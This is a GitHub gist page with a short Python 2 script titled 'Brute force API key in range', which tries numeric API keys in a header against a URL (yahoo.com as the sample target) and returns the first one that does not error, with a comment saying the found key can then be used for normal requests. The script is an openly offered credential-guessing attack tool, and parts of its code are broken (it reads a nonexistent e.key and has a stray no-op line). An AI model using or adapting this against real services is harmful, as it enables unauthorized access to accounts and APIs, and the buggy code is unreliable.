Created
February 11, 2020 16:23
-
-
Save bmelton/21e8608243cae33c7c8f7345b4fdf786 to your computer and use it in GitHub Desktop.
Brute force API key in range
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import urllib | |
import urllib2 | |
def brute_force_api_key(url, begin_api_key, ending_api_key): | |
actual_api_key = None | |
for api_key in range(begin_api_key, ending_api_key): | |
headers = { 'X-API': api_key } | |
data = {} | |
values = urllib.urlencode(data) | |
request = urllib2.Request(url, values, headers) | |
try: | |
response = urllib2.urlopen(request) | |
response_headers = response.info() | |
response_headers.dict | |
# If this succeeds, the response.code == 200, which is a success. | |
# It might also be some number other than 200 (301, 302 might be valid, | |
# indicating redirect, but anything over that is considered faulty) | |
return api_key | |
except urllib2.HTTPError, e: | |
print ("Error key: %s" % e.key) | |
return actual_api_key | |
url = 'https://yahoo.com/' | |
actual_api_key = brute_force_api_key(url, 5500, 6000) | |
print(actual_api_key) | |
# Now that you have determined the API key, you can make normal | |
# requests, providing `actual_api_key` where needed |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment